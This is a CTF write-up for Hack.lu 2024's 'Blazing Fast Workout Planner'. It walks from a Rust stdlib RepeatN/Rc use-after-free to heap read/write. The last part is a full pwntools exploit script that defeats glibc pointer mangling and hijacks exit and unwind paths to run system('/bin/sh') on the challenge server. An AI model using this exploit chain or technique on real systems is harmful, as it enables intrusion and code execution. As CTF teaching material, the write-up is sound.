Hack.lu CTF 2024: "Blazing Fast Workout Planner"

index

First look

Here is the source code for the challenge:

1
#![feature(get_mut_unchecked)]
2

3
use std::collections::BTreeMap;
4
use std::io::{self, Read, Stdin, Stdout, Write};
5
use std::iter::RepeatN;
6
use std::rc::Rc;
7

8
struct InputHelper {
9
    stdin: Stdin,
10
    stdout: Stdout,
11
    buf: Vec<u8>,
12
}
13

14
impl InputHelper {
15
    fn with_capacity(cap: usize) -> Self {
16
        let stdin = io::stdin();
17
        let stdout = io::stdout();
18
        Self {
19
            stdin,
20
            stdout,
21
            buf: vec![0u8; cap],
22
        }
23
    }
24

25
    fn ask(&mut self, msg: &str) -> &[u8] {
26
        self.stdout.write(msg.as_bytes()).unwrap();
27
        self.stdout.write(b"\n").unwrap();
28
        let len = self.stdin.read(&mut self.buf).unwrap();
29
        &self.buf[..len].trim_ascii()
30
    }
31

32
    fn ask_num(&mut self, msg: &str) -> i64 {
33
        let buf = self.ask(msg);
34
        std::str::from_utf8(buf).unwrap().parse().unwrap()
35
    }
36
}
37

38
#[derive(Debug)]
39
struct Exercise {
40
    name: Vec<u8>,
41
    description: Vec<u8>,
42
}
43

44
#[derive(Debug, Clone)]
45
struct Workout {
46
    exercises: Vec<RepeatN<Rc<Exercise>>>,
47
}
48

49
fn main() {
50
    let mut exercises = BTreeMap::new();
51
    let mut workouts = Vec::new();
52

53
    let mut input = InputHelper::with_capacity(0x100);
54

55
    println!("Welcome to your personal training helper! Here are your options:");
56
    loop {
57
        println!("1. : add a new exercise to your portfolio");
58
        println!("2. : plan a new workout");
59
        println!("3. : start a training session");
60
        println!("4. : edit an exercise");
61
        println!("5. : exit the app");
62

63
        let line = input.ask("Choose an option: ").trim_ascii();
64
        match &*line {
65
            b"1" => {
66
                let name = input.ask("What's the name of your exercise? ").to_owned();
67

68
                let description = input
69
                    .ask("what is the description of your exercise? ")
70
                    .to_owned();
71

72
                let name2 = name.clone();
73
                let exercise: Exercise = Exercise { name, description };
74
                exercises.insert(name2, Rc::new(exercise));
75
                println!("Exercise added!");
76
            }
77
            b"2" => {
78
                let num_exercises = input.ask_num("How many exercises should your workout have? ");
79
                let mut workout = Workout {
80
                    exercises: Vec::new(),
81
                };
82

83
                for _ in 0..num_exercises {
84
                    let name = input.ask("Enter the name of the exercise: ");
85
                    if let Some(exercise) = exercises.get(name) {
86
                        let num_repetitions =
87
                            input.ask_num("How many times should your exercise be repeated? ");
88
                        workout.exercises.push(std::iter::repeat_n(
89
                            Rc::clone(exercise),
90
                            num_repetitions as usize,
91
                        ));
92
                    } else {
93
                        println!("No exercise found with that name.");
94
                    }
95
                }
96

97
                println!("Your workout has id {}", workouts.len());
98
                workouts.push(workout);
99
            }
100
            b"3" => {
101
                let id = input.ask_num("what's the id of your workout? ");
102

103
                let workout = &workouts[id as usize];
104

105
                for exercise in workout.exercises.iter().cloned() {
106
                    for ex in exercise {
107
                        println!("{:?} - {:?}", ex.name, ex.description); // pls  help, this looks weird :(
108
                    }
109
                }
110
            }
111
            b"4" => {
112
                let name = input.ask("Enter the name of the exercise you want to edit: ");
113
                if let Some(exercise) = exercises.get_mut(name) {
114
                    let description = input.ask("Enter the new description: ");
115
                    unsafe {
116
                        Rc::get_mut_unchecked(exercise)
117
                            .description
118
                            .copy_from_slice(description)
119
                    }
120
                    println!("Exercise updated!");
121
                } else {
122
                    println!("No exercise found with that name.");
123
                }
124
            }
125
            b"5" => break,
126
            _ => println!("That was not a valid option"),
127
        }
128
    }
129
}

The challenge allows you to create Exercise structures and Workout structures:

1
#[derive(Debug)]
2
struct Exercise {
3
    name: Vec<u8>,
4
    description: Vec<u8>,
5
}
6

7
#[derive(Debug, Clone)]
8
struct Workout {
9
    exercises: Vec<RepeatN<Rc<Exercise>>>,
10
}

and always wraps Exercise in a Rc:

1
                let exercise: Exercise = Exercise { name, description };
2
                exercises.insert(name2, Rc::new(exercise));
3
                println!("Exercise added!");

`std::rc::Rc`

Rc stands for “reference counted” and is documented here in the Rust documentation. Rc is a type that allows for shared ownership of a value through refcounting. When an Rc is created, the internal refcount is set to 1. When an Rc is cloned, the internal refcount is incremented, and when one is dropped the refcount is decremented. Modifying the value inside an Rc is only allowed when the refcount is 1, meaning that there is only one owner and Rust's shared-mutability rules are not broken.

The internal structure of Rc looks like this:

1
struct RcBox<T> {
2
    size_t strong;
3
    size_t weak;
4
    T value;
5
};
6

7
struct Rc<T> {
8
    RcBox<T> * ptr;
9
};

All of the cloned copies of an Rc point to the same RcBox, which is allocated on the heap. When the strong refcount reaches 0, the wrapped value is dropped and (as long as no Weak references remain) the RcBox allocation is freed. This is safe because once the strong count reaches 0 there are no Rc handles left to clone or dereference.

Sus code 1

Immediately this part of the code looks suspicious:

1
            b"4" => {
2
                let name = input.ask("Enter the name of the exercise you want to edit: ");
3
                if let Some(exercise) = exercises.get_mut(name) {
4
                    let description = input.ask("Enter the new description: ");
5
                    unsafe {
6
                        Rc::get_mut_unchecked(exercise)
7
                            .description
8
                            .copy_from_slice(description)
9
                    }
10
                    println!("Exercise updated!");
11
                } else {
12
                    println!("No exercise found with that name.");
13
                }
14
            }

since it contains an unsafe block. However, this code, in the context of the rest of the program, is actually “safe”: if an Rc value exists in the BTreeMap, its refcount must be at least 1, so the backing allocation is still live and it is safe to write to the underlying value. This part of the code is not exploitable, even though it contains an unsafe block.

Sus code 2

The type of the Workout->exercises vec is Vec<RepeatN<Rc<Exercise>>>, which is unusual. I have never come across Rust code that stored a RepeatN iterator combined with Rc values. A quick search for “RepeatN” and “Rc” brings up a GitHub issue that mentions a UAF bug in the standard library involving RepeatN iterators over Rc values!

https://github.com/rust-lang/rust/issues/130140

The issue was opened on 09/09/24, and the provided rust-toolchain.toml pins the rustc version to nightly-2024-09-09. Not suspicious at all.

stdlib UAF

What does RepeatN do? RepeatN is an iterator type that returns the wrapped value $n$ times before terminating. The issue arises from how Rc interacts with RepeatN when the repeat count is 0.

This is the POC segfault provided by the GitHub issue:

1
use std::rc::Rc;
2
fn main() {
3
    let mut c = [0; 100];
4
    let x = std::iter::repeat_n(Rc::new(0), 0);
5
    let y = Box::new(&mut c);
6
    for _ in 0..100 {
7
        _ = x.clone();
8
    }
9
    y.fill(0);
10
}

When a RepeatN iterator is constructed with a count of 0 it will immediately drop the wrapped value. This causes problems for Rc because the backing pointer is freed while RepeatN still holds a reference to it. Cloning the RepeatN iterator after the Rc value is freed will increment the RcBox<T>->strong count of the now-freed backing pointer, giving a UAF increment primitive.

UAF heap increment

In order to properly exploit this bug we need to allocate some heap object over the UAF’d object that has a useful value in the first qword (so it overlaps with RcBox<T>->strong). On GNU/Linux systems Rust defaults to linking glibc and defers to glibc malloc to manage memory. RcBox<Exercise> gets allocated in a 0x50 sized chunk, so we need to somehow reclaim the freed RcBox<Exercise> with a useful structure. Since we only control the first qword, the structure must have some useful field in the first qword that allows for further exploitation.

It turns out that the backing memory for the Workout->exercises vector is allocated in a 0x50 sized chunk!

The backing memory looks like this:

         ┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ uaf increment on this value
 +0x00 | pointer to RcBox<Exercise> | ━┓
 +0x08 | repeat count               | ━┻━━━ workout->exercises[0]
 +0x10 | pointer to RcBox<Exercise> | ━┓
 +0x18 | repeat count               | ━┻━━━ workout->exercises[1]

Arbitrary heap increment

Remember that the Workout->exercises vector stores RepeatN<Rc<Exercise>> values. The original UAF increment is initially achieved through RepeatN with a count of 0, but now we can control the RcBox<Exercise> pointer that RepeatN uses. Using the initial UAF increment to modify the RcBox<Exercise> pointer of another RepeatN escalates the bug to an arbitrary increment in the heap.

Arbitrary heap read/write

With the arbitrary increment we can now modify the backing pointer of the Exercise->description field:

1
struct Exercise {
2
    name: Vec<u8>,
3
    description: Vec<u8>,
4
}

Modifying Exercise("A")->description to point to Exercise("B")->description escalates our arbitrary increment bug to arbitrary heap read/write. We use Exercise("A") to point the description field of Exercise("B") at an arbitrary address, then read from or write to Exercise("B") to achieve arbitrary read/write:

1
            b"4" => {
2
                let name = input.ask("Enter the name of the exercise you want to edit: ");
3
                if let Some(exercise) = exercises.get_mut(name) {
4
                    let description = input.ask("Enter the new description: ");
5
                    unsafe {
6
                        Rc::get_mut_unchecked(exercise)
7
                            .description
8
                            .copy_from_slice(description)
9
                    }
10
                    println!("Exercise updated!");
11
                } else {
12
                    println!("No exercise found with that name.");
13
                }
14
            }

RCE

Normally the go-to libc RCE is overwriting stdout and using the wide vtable to call system("/bin/sh"), but this is Rust, whose stdlib does not use libc's stdout and stdin FILE streams. Instead it uses the file descriptors directly, bypassing libc's stdout and making FSOP impossible.

Alternatively we can attack the destructors that are called in exit(), but that causes its own issues because of all the heap pointers that have been modified, which crashes the program when main returns.

There is another novel method which I discovered while playing another CTF. The full call chain looks like:

__libc_read
┗━ SYSCALL_CANCEL
  ┗━ LIBC_CANCEL_ASYNC
    ┗━ __pthread_enable_asynccancel
      ┗━ __do_cancel
        ┗━ __pthread_unwind
          ┗━ _Unwind_ForcedUnwind
            ┗━ PTR_DEMANGLE(link()->ptr__Unwind_ForcedUnwind)

It only depends on the program using the __libc_read function. Breaking on __libc_read and running the challenge shows that __libc_read is used by the Rust stdlib!

1
#0  __GI___libc_read (fd=0x0, buf=0x5555555c2b80, nbytes=0x2000)
2
    at ../sysdeps/unix/sysv/linux/read.c:25
3
#1  0x000055555559716e in std::sys::pal::unix::fd::FileDesc::read_buf ()
4
    at std/src/sys/pal/unix/fd.rs:156
5
#2  std::sys::pal::unix::stdio::{impl#1}::read_buf () at std/src/sys/pal/unix/stdio.rs:22
6
#3  std::io::stdio::{impl#0}::read_buf () at std/src/io/stdio.rs:104
7
#4  std::io::impls::{impl#0}::read_buf<std::io::stdio::StdinRaw> () at std/src/io/impls.rs:21
8
#5  std::io::buffered::bufreader::buffer::Buffer::fill_buf<&mut std::io::stdio::StdinRaw> ()
9
    at std/src/io/buffered/bufreader/buffer.rs:136
10
#6  std::io::buffered::bufreader::{impl#6}::fill_buf<std::io::stdio::StdinRaw> ()
11
    at std/src/io/buffered/bufreader.rs:433
12
#7  std::io::buffered::bufreader::{impl#5}::read<std::io::stdio::StdinRaw> ()
13
    at std/src/io/buffered/bufreader.rs:325
14
#8  0x0000555555597d66 in std::io::stdio::{impl#8}::read () at std/src/io/stdio.rs:499
15
#9  std::io::stdio::{impl#5}::read () at std/src/io/stdio.rs:433
16
#10 0x000055555557a29c in blazing_fast_workout_planner::InputHelper::ask (self=0x7fffffffd460,
17
    msg="Choose an option: ") at src/main.rs:28
18
#11 0x000055555557a69a in blazing_fast_workout_planner::main () at src/main.rs:63

Elixir links

__libc_read SYSCALL_CANCEL LIBC_CANCEL_ASYNC __pthread_enable_asynccancel __do_cancel __pthread_unwind _Unwind_ForcedUnwind __libc_unwind_link_get UNWIND_LINK_PTR

Here are the necessary requirements to trigger a call to an arbitrary function (in this case exit):

1
*((fs_base + 0x308) as *mut u64) = 8;
2
libc.global.ptr__Unwind_ForcedUnwind = PTR_MANGLE(exit);
3
libc.global_libgcc_handle = 1 as usize;
4
libc.__libc_single_threaded_internal = 0 as u8;

Also set up a destructor to trigger a shell:

1
libc.__exit_funcs[0].fns[0].func.on.fn = PTR_MANGLE(system);
2
libc.__exit_funcs[0].fns[0].func.on.arg = &"/bin/sh";

Full solve

1
from pwn import *
2
from pwnc.gdb.launch import attach
3
import builtins
4

5
if args.REMOTE:
6
    p = remote("162.55.187.21", "1024")
7
else:
8
    p = remote("localhost", 1024)
9
    p.recv(1)
10
p.settimeout(10)
11

12
file = ELF("./chall")
13
linker = ELF("./ld-linux-x86-64.so.2")
14
libc = ELF("./libc.so.6")
15

16
if args.GDB:
17
    g = attach("/chall", elf=file)
18

19
def tele(n: int):
20
    return g.parse_and_eval(f"(usize[{n}]*)0").type
21

22
exercises = []
23
def callback():
24
    global exercises
25
    val = g.parse_and_eval("value.ptr.pointer")
26
    val.format_string()
27
    exercises.append(val)
28

29
    return False
30

31
if args.GDB:
32
    track = g.bp(
33
        "alloc::collections::btree::map::BTreeMap<alloc::vec::Vec<u8, alloc::alloc::Global>, alloc::rc::Rc<blazing_fast_workout_planner::Exercise, alloc::alloc::Global>, alloc::alloc::Global>::insert<alloc::vec::Vec<u8, alloc::alloc::Global>, alloc::rc::Rc<blazing_fast_workout_planner::Exercise, alloc::alloc::Global>, alloc::alloc::Global>",
34
        callback
35
    )
36
    g.execute("b system")
37
    g.execute("c")
38

39
def send(after: bytes, val, line: bool = False):
40
    match type(val):
41
        case builtins.int | builtins.str:
42
            val = f"{val}".encode()
43
        case builtins.bytes:
44
            pass
45
    if line: exit("bad")
46
    p.sendafter(after, val.ljust(0x100, b" "))
47

48
def sendline(after: bytes, val):
49
    send(after, val, line=True)
50

51
def make_exercise(name: int, desc: int, name_size: int = 0, desc_size: int = 8):
52
    payload = b""
53
    payload += p64(1) * 2
54
    payload += p64(name_size)
55
    payload += p64(name)
56
    payload += p64(name_size)
57
    payload += p64(desc_size)
58
    payload += p64(desc)
59
    payload += p64(desc_size)
60
    payload += p64(1)
61
    return payload
62

63
def create_exercise(name: bytes, desc: bytes):
64
    send(b"option: \n", 1)
65
    send(b"? \n", name)
66
    send(b"? \n", desc)
67

68
if args.GDB:
69
    create_exercise = track.wait(create_exercise)
70

71
def plan_workout(exs: list[tuple[bytes, int]]):
72
    send(b"option: \n", 2)
73
    send(b"? \n", len(exs))
74
    for ex in exs:
75
        send(b": \n", ex[0])
76
        send(b"? \n", ex[1])
77
    p.recvuntil(b"Your workout has id ")
78
    return int(p.recvline())
79

80
def start_session(id: int):
81
    send(b"option: \n", 3)
82
    send(b"? \n", id)
83

84
    outputs = []
85
    while True:
86
        ch = p.recv(1)
87
        if ch != b"[":
88
            break
89

90
        name = bytes(eval("[" + p.recvuntil(b"]", drop=True).decode() + "]"))
91
        p.recvuntil(b" - ")
92
        desc = bytes(eval(p.recvline().decode()))
93
        outputs.append((name, desc))
94

95
    return outputs
96

97
def edit_exercise(name, desc):
98
    send(b"option: \n", 4)
99
    send(b": \n", name)
100
    send(b": \n", desc)
101

102
a = "a" * 0x18
103
b = "b" * 0x18
104
mapping = {}
105

106
create_exercise(a, "0")
107
id = plan_workout([
108
    (a, 0),
109
])
110
mapping[a] = id
111
create_exercise(a, "1")
112

113
victim = plan_workout([
114
    (a, 0),
115
])
116

117
tramp = "T" * 0x48
118
target = "X" * 0x48
119
create_exercise(tramp, "R" * 0x48)
120
create_exercise(target, "Y" * 0x48)
121

122
if args.GDB:
123
    print([str(ex) for ex in exercises])
124
    print(exercises[0].cast(tele(4))[0].format_string())
125

126
payload = b""
127
for _ in range(0x170):
128
    payload += b"3".ljust(0x100, b" ")
129
    payload += f"{mapping[a]}".encode().ljust(0x100, b" ")
130

131
send(b"option: \n", payload)
132
for _ in range(0x170-1):
133
    p.recvuntil(b"option: \n")
134

135
if args.GDB:
136
    print(exercises[0].cast(tele(4))[0].format_string())
137

138
payload = b""
139
for _ in range(0x1e0):
140
    payload += b"3".ljust(0x100, b" ")
141
    payload += f"{victim}".encode().ljust(0x100, b" ")
142

143
send(b"option: \n", payload)
144
for _ in range(0x1e0-1):
145
    p.recvuntil(b"option: \n")
146

147
print(f"{tramp = }")
148

149
leaker = plan_workout([
150
    (tramp, 1),
151
])
152
leaks = start_session(leaker)
153
leak = u64(leaks[0][1][0x18:0x20])
154
print(f"{leak = :#x}")
155
heapbase = leak - 0x3180
156
print(f"{heapbase = :#x}")
157

158
reader = plan_workout([
159
    (target, 1),
160
])
161

162
def arbread(addr: int):
163
    edit_exercise(tramp, make_exercise(heapbase, addr))
164
    leaks = start_session(reader)
165
    print(leaks)
166
    return leaks[0][1]
167

168
def arbwrite(addr: int, val: bytes):
169
    edit_exercise(tramp, make_exercise(heapbase, addr, desc_size=len(val)))
170
    assert b"\n" not in val
171
    edit_exercise(target, val)
172

173
leak = u64(arbread(heapbase + 0x470))
174
print(f"{leak = :#x}")
175
libc.address = leak - 0x202228
176
print(f"{libc.address = :#x}")
177

178
linker.address = u64(arbread(libc.address + 0x2046b8)) - 0x38000
179

180
fn = libc.address + 0x204fd8
181
enc = u64(arbread(fn))
182
mask = (1 << 64) - 1
183
cookie = (enc >> 17 & mask) | (enc << (64 - 17) & mask)
184
cookie ^= linker.sym._dl_fini
185

186
print(f"{cookie = :#x}")
187

188
enc = libc.sym.system ^ cookie
189
enc = (enc << 17 & mask) | (enc >> (64 - 17) & mask)
190
arbwrite(libc.sym.initial + 24, p64(enc) + p64(next(libc.search(b"/bin/sh\x00"))))
191

192
tls = u64(arbread(linker.address + 0x390a0)) - 0x9a0
193
print(f"{tls = :#x}")
194

195
enc = libc.sym.exit ^ cookie
196
enc = (enc << 17 & mask) | (enc >> (64 - 17) & mask)
197
arbwrite(tls + 0x308, p32(8))
198
arbwrite(libc.sym.global_libgcc_handle, p64(1))
199
arbwrite(libc.address + 0x20b080 + 8, p64(enc))
200
arbwrite(libc.sym.__libc_single_threaded_internal, p8(0))
201

202
if args.GDB:
203
    g.execute("interrupt")
204
p.interactive()